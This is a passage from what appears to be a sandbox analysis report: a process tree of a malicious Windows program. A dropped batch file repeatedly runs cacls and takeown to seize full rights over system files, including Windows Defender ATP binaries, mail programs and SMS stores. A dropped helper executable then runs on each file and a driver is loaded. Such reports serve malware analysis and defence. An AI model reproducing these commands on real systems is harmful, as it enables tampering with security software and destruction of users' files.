      YDR1ohI7.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4920
    - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI764.exe
        
        YDR1ohI7.exe -accepteula "classes.jsa" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"
    3⤵
    - Modifies file permissions
    PID:5100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "qmgr.db" -nobanner
    3⤵
    PID:2408
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "qmgr.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:2736
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""
  2⤵
  PID:4368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "SmsInterceptStore.db" -nobanner
    3⤵
    PID:228
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "SmsInterceptStore.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:4440
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:1432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:4636
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4668
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:4624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:4436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4856
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:4336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:5112
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2144
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:5036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:4484
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4764
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:4692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "manifest.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:4936
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  PID:4968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:5104
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2840
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:2244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4652
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4460
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:4372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:2168
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4520
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""
  2⤵
  PID:3892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "MsSense.exe.mui" -nobanner
    3⤵
    PID:4376
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "MsSense.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4356
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:4328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5076
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:276
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""
  2⤵
  PID:4456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:4672
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "Identity-V" -nobanner
      4⤵
      Executes dropped EXE
      PID:4476
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4280
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2796
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "SenseCncProxy.exe" -nobanner
    3⤵
    PID:696
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "SenseCncProxy.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1196
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4316
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""
  2⤵
  PID:5064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"
    3⤵
    - Modifies file permissions
    PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
    3⤵
    PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2288
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:5068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:1612
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:5044
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:5012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:4688
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:5096
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:300
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:4976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    - Modifies file permissions
    PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4940
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    - Modifies file permissions
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:4364
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:4540
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:4312
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:5092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "settings.dat" -nobanner
      4⤵
      Executes dropped EXE
      PID:4836
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:5028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:4268
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
      YDR1ohI7.exe -accepteula "settings.dat" -nobanner
      4⤵
      Executes dropped EXE
      PID:4488
- - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
    YDR1ohI7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:5052
